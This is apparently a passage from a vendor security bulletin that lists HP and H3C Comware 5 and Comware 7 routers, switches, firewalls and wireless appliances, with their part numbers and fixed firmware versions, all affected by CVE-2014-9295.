MSR 50 (Comware 5) R2513P45 JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR5040-DCOVS-H3C (0235A20P), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L) CVE-2014-9295

MSR 50-G2 (Comware 5) R2513P45 JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL) CVE-2014-9295

MSR 9XX (Comware 5) R2513P45 JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router, JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr, JG207A HP MSR900-W Router (NA), JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0) CVE-2014-9295

MSR 93X (Comware 5) R2513P45 JG512A HP MSR930 Wireless Router, JG513A HP MSR930 3G Router, JG514A HP MSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP MSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router, JG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930 4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G LTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router N/A CVE-2014-9295

MSR1000 (Comware 5) R2513P45 JG732A HP MSR1003-8 AC Router N/A CVE-2014-9295

MSR20 (Comware 5 - Low Encryption SW) R2513L61 JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326) CVE-2014-9295

MSR20-1X (Comware 5 - Low Encryption SW) R2513L61 JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C RT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-TAC-OVS-H3 (0235A398), H3C RT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) CVE-2014-9295

MSR30 (Comware 5 - Low Encryption SW) R2513L61 JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) CVE-2014-9295

MSR30-16 (Comware 5 - Low Encryption SW) R2513L61 JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) CVE-2014-9295

MSR30-1X (Comware 5 - Low Encryption SW) R2513L61 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) CVE-2014-9295

MSR50 (Comware 5 - Low Encryption SW) R2513L61 JD433A HP MSR50-40 Router, JD653A HP MSR50Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DCOVS-H3C (0235A20P) CVE-2014-9295

MSR50 G2 (Comware 5 - Low Encryption SW) R2513L61 JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL) CVE-2014-9295

12500 (Comware 5) R1828P06 JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch (AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) CVE-2014-9295

9500E (Comware 5) R1828P06 JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP A9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch Chassis, JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch Chassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C S9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R) CVE-2014-9295

10500 (Comware 5) R1208P10 JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512 Switch Chassis, JG375A HP 10500 TAA-compliant Main Processing Unit, JG820A HP 10504 TAA-compliant Switch Chassis, JG821A HP 10508 TAA-compliant Switch Chassis, JG822A HP 10508-V TAA-compliant Switch Chassis, JG823A HP 10512 TAA-compliant Switch Chassis

CVE-2014-9295

7500 (Comware 5) R6708P10 JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo, JC697A HP 7502 TAA-compliant Main Processing Unit, JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports, JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports, JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit, JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit, JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports, JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports, JD194A HP 7500 384Gbps Fabric Module, JD194B HP 7500 384Gbps Fabric Module, JD195A HP 7500 384Gbps Advanced Fabric Module, JD196A HP 7502 Fabric Module, JD220A HP 7500 768Gbps Fabric Module, JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports, JD238A HP 7510 Switch Chassis, JD238B HP 7510 Switch Chassis, JD239A HP 7506 Switch Chassis, JD239B HP 7506 Switch Chassis, JD240A HP 7503 Switch Chassis, JD240B HP 7503 Switch Chassis, JD241A HP 7506-V Switch Chassis, JD241B HP 7506-V Switch Chassis, JD242A HP 7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP 7503-S Switch Chassis with 1 Fabric Slot, JD243B HP 7503-S Switch Chassis with 1 Fabric Slot, JE164A HP E7902 Switch Chassis, JE165A HP E7903 Switch Chassis, JE166A HP E7903 1 Fabric Slot Switch Chassis, JE167A HP E7906 Switch Chassis, JE168A HP E7906 Vertical Switch Chassis, JE169A HP E7910 Switch Chassis

CVE-2014-9295

5830 (Comware 5) R1118P11 JC691A HP 5830AF-48G Switch with 1 Interface Slot, JC694A HP 5830AF-96G Switch, JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot, JG374A HP 5830AF-96G TAA-compliant Switch

CVE-2014-9295

5800 (Comware 5) R1809P03 JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP 5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2 Slots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP 5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot, JC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1 Interface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP 5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch, JG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G Switch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface

CVE-2014-9295

5820 (Comware 5) R1809P03 JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch

CVE-2014-9295

5500 HI (Comware 5) R5501P06 JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots, JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots, JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots, JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots, JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots, JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots, JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots, JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots

CVE-2014-9295

5500 EI (Comware 5) R2221P08 JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP 5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI Switch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI Switch, JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots, JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots, JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface, JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots, JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots, JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots, JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots

CVE-2014-9295

4800G (Comware 5) R2221P08 JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP 4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch

CVE-2014-9295

5500SI (Comware 5) R2221P08 JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP 5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots, JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots

CVE-2014-9295

4500G (Comware 5) R2221P08 JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch

CVE-2014-9295

5120 EI (Comware 5) R2221P08 JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP 5120-24G EI Switch with 2 Interface Slots, JE069A HP 5120-48G EI Switch with 2 Interface Slots, JE070A HP 5120-24G-PoE EI 2-slot Switch, JE071A HP 5120-48G-PoE EI 2-slot Switch, JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots, JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots, JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots, JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots, JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots, JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots

CVE-2014-9295

4210G (Comware 5) R2221P08 JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE Switch

CVE-2014-9295

5120 SI (Comware 5) R1513P95 JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP 5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP 5120-24G-PoE+ (170W) SI Switch

CVE-2014-9295

3610 (Comware 5) R5319P10 JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP 3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch

CVE-2014-9295

3600V2 (Comware 5) R2110P03 JG299A HP 3600-24 v2 EI Switch, JG299B HP 3600-24 v2 EI Switch, JG300A HP 3600-48 v2 EI Switch, JG300B HP 3600-48 v2 EI Switch, JG301A HP 3600-24-PoE+ v2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG301C HP 3600-24-PoE+ v2 EI Switch, JG302A HP 3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI Switch, JG302C HP 3600-48-PoE+ v2 EI Switch, JG303A HP 3600-24-SFP v2 EI Switch, JG303B HP 3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch, JG304B HP 3600-24 v2 SI Switch, JG305A HP 3600-48 v2 SI Switch, JG305B HP 3600-48 v2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP 3600-24-PoE+ v2 SI Switch, JG306C HP 3600-24-PoE+ v2 SI Switch, JG307A HP 3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI Switch, JG307C HP 3600-48-PoE+ v2 SI Switch

CVE-2014-9295

3100V2-48 (Comware 5) R2110P03 JG315A HP 3100-48 v2 Switch, JG315B HP 3100-48 v2 Switch

CVE-2014-9295

3100V2 (Comware 5) R5203P11 JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP 3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI Switch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch

CVE-2014-9295

HP870 (Comware 5) R2607P35 JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance

CVE-2014-9295

HP850 (Comware 5) R2607P35 JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance

CVE-2014-9295

HP830 (Comware 5) R3507P35 JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch, JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch, JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch, JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant

CVE-2014-9295

HP6000 (Comware 5) R2507P35 JG639A HP 10500/7500 20G Unified Wired-WLAN Module, JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module

CVE-2014-9295

WX5004-EI (Comware 5) R2507P35 JD447B HP WX5002 Access Controller, JD448A HP WX5004 Access Controller, JD448B HP WX5004 Access Controller, JD469A HP WX5004 Access Controller

CVE-2014-9295

SecBlade FW (Comware 5) R3181P05 JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module, JD249A HP 10500/7500 Advanced VPN Firewall Module, JD250A HP 6600 Firewall Processing Router Module, JD251A HP 8800 Firewall Processing Module, JD255A HP 5820 VPN Firewall Module

CVE-2014-9295

F1000-E (Comware 5) R3181P05 JD272A HP F1000-E VPN Firewall Appliance

CVE-2014-9295

F1000-A-EI (Comware 5) R3734P06 JG214A HP F1000-A-EI VPN Firewall Appliance

CVE-2014-9295

F1000-S-EI (Comware 5) R3734P06 JG213A HP F1000-S-EI VPN Firewall Appliance

CVE-2014-9295

F5000-A (Comware 5) F3210P23 JD259A HP A5000-A5 VPN Firewall Chassis, JG215A HP F5000 Firewall Main Processing Unit, JG216A HP F5000 Firewall Standalone Chassis

CVE-2014-9295

U200S and CS (Comware 5) F5123P31 JD273A HP U200-S UTM Appliance

CVE-2014-9295

U200A and M (Comware 5) F5123P31 JD275A HP U200-A UTM Appliance

CVE-2014-9295

F5000-C/S (Comware 5) R3811P03 JG650A HP F5000-C VPN Firewall Appliance, JG370A HP F5000-S VPN Firewall Appliance

CVE-2014-9295

SecBlade III (Comware 5) R3820P03 JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module

CVE-2014-9295

MSR20 RU (Comware 5 Low Encryption SW) R2513L61 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40, JF283A HP MSR20-20 Router

CVE-2014-9295

MSR20-1X RU (Comware 5 Low Encryption SW) R2513L61 JD431A HP MSR20-10 Router, JD667A HP A-MSR20-15 IW Multi-service Router, JD668A HP MSR20-13 Router, JD669A HP MSR20-13-W Router, JD670A HP A-MSR20-15 A Multi-service Router, JD671A HP A-MSR20-15 AW Multi-service Router, JD672A HP A-MSR20-15 I Multi-service Router, JD673A HP MSR20-11 Router, JD674A HP MSR20-12 Router, JD675A HP MSR20-12-W Router, JD676A HP MSR20-12-T Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router, JG210A HP MSR20-13-W Router

CVE-2014-9295

MSR30 RU (Comware 5 Low Encryption SW) R2513L61 JD654A HP MSR30-60 PoE Router, JD657A HP MSR30-40 Router, JD658A HP MSR30-60 Router, JD660A HP MSR30-20 PoE Router, JD661A HP MSR30-40 PoE Router, JD666A HP MSR30-20 Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF232A HP A-MSR30-40 (RT-MSR3040-AC-OVS-AS-H3) Multi-service Router, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router, JG728A HP MSR30-20 TAA-compliant DC Router, JG729A HP MSR30-20 TAA-compliant Router

CVE-2014-9295

MSR301X RU (Comware 5 Low Encryption SW) R2513L61 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 Router, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router

CVE-2014-9295

MSR316 RU (Comware 5 Low Encryption SW) R2513L61 JD659A HP MSR30-16 PoE Router, JD665A HP MSR30-16 Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router

CVE-2014-9295

MSR50 RU (Comware 5 Low Encryption SW) R2513L61 JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply

CVE-2014-9295

MSR50 EPU RU (Comware 5 Low Encryption SW) R2513L61 JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module, JD433A HP MSR50-40 Router, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply

CVE-2014-9295

MSR1000 RU (Comware 5 Low Encryption SW) R2513L61 JG732A HP MSR1003-8 AC Router

CVE-2014-9295

6600 RSE RU (Comware 5 Low Encryption SW) R3303P18 JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit

CVE-2014-9295

6600 RPE RU (Comware 5 Low Encryption SW) R3303P18 JC165A) HP 6600 RPE-X1 Router Module, JG781A) HP 6600 RPE-X1 TAA-compliant Main Processing Unit

CVE-2014-9295

6602 RU (Comware 5 Low Encryption SW) R3303P18 JC176A) HP 6602 Router Chassis

CVE-2014-9295

HSR6602 RU (Comware 5 Low Encryption SW) R3303P18 JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit

CVE-2014-9295

HSR6800 RU (Comware 5 Low Encryption SW) R3303P18 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit

CVE-2014-9295

SMB1910 (Comware 5) R1108 JG540A HP 1910-48 Switch, JG539A HP 1910-24-PoE+ Switch, JG538A HP 1910-24 Switch, JG537A HP 1910-8 -PoE+ Switch, JG536A HP 1910-8 Switch

CVE-2014-9295

SMB1920 (Comware 5) R1106 JG928A HP 1920-48G-PoE+ (370W) Switch, JG927A HP 1920-48G Switch, JG926A HP 1920-24G-PoE+ (370W) Switch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG924A HP 1920-24G Switch, JG923A HP 1920-16G Switch, JG922A HP 1920-8G-PoE+ (180W) Switch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG920A HP 1920-8G Switch

CVE-2014-9295

V1910 (Comware 5) R1513P95 JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE (365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G Switch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A HP 1910-8G-PoE+ (180W) Switch

CVE-2014-9295

SMB 1620 (Comware 5) R1105 JG914A HP 1620-48G Switch, JG913A HP 1620-24G Switch, JG912A HP 1620-8G Switch

CVE-2014-9295

COMWARE 7 Products

12500 (Comware 7) R7328P04 JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP 12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP FF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP FF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU, JG836A HP FlexFabric 12518E AC Switch TAA-compliant Chassis, JG834A HP FlexFabric 12508E AC Switch TAA-compliant Chassis, JG835A HP FlexFabric 12508E DC Switch TAA-compliant Chassis, JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis, JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit, JG796A HP FlexFabric 12500 48-port 10GbE SFP+ FD Module, JG790A HP FlexFabric 12500 16-port 40GbE QSFP+ FD Module, JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module, JG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module, JG788A HP FlexFabric 12500 4-port 100GbE CFP FG Module, JG786A HP FlexFabric 12500 4-port 100GbE CFP FD Module, JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant Module, JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant Module, JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant Module, JG793A HP FlexFabric 12500 40-port 10GbE SFP+ FD TAA-compliant Module, JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module, JG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module, JG798A HP FlexFabric 12508E Fabric Module H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch (AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) CVE-2014-9295

11900 (Comware 7) R7169P01 JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing Unit, JG610A HP FF 11908 1.92Tbps Type D Fabric Module, JG611A HP FF 11900 32p 10GbE SFP+ SF Module, JG612A HP FF 11900 48p 10GbE SFP+ SF Module, JG613A HP FF 11900 4p 40GbE QSFP+ SF Module, JG614A HP FF 11900 8p 40GbE QSFP+ SF Module, JG615A HP FF 11900 24-p 1/10GBASE-T SF Module, JG616A HP FF 11900 2500W AC Power Supply, JG617A HP FF 11900 2400W DC Power Supply, JG618A HP FF 11908-V Spare Fan Assy, JG918A HP FF 11900 2p 100GbE CFP SE Module

CVE-2014-9295

10500 (Comware 7) R7150 JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA Switch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA Switch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A MPU w/Comware v7 OS, JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System, JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+ (SFP+,LC) SE Module, JH192A HP 10500 48-port Gig-TRJ45SE Module, JH193A HP 10500 16-port 10GbE SFP+ (SFP+,LC) SF Module, JH194A HP 10500 24-port 10GbE SFP+ (SFP+,LC) EC Module, JH195A HP 10500 6-port 40GbE QSFP+ EC Module, JH196A HP 10500 2-port 100GbE CFP EC Module, JH197A HP 10500 48-port 10GbE SFP+ (SFP+,LC) SG Module N/A CVE-2014-9295

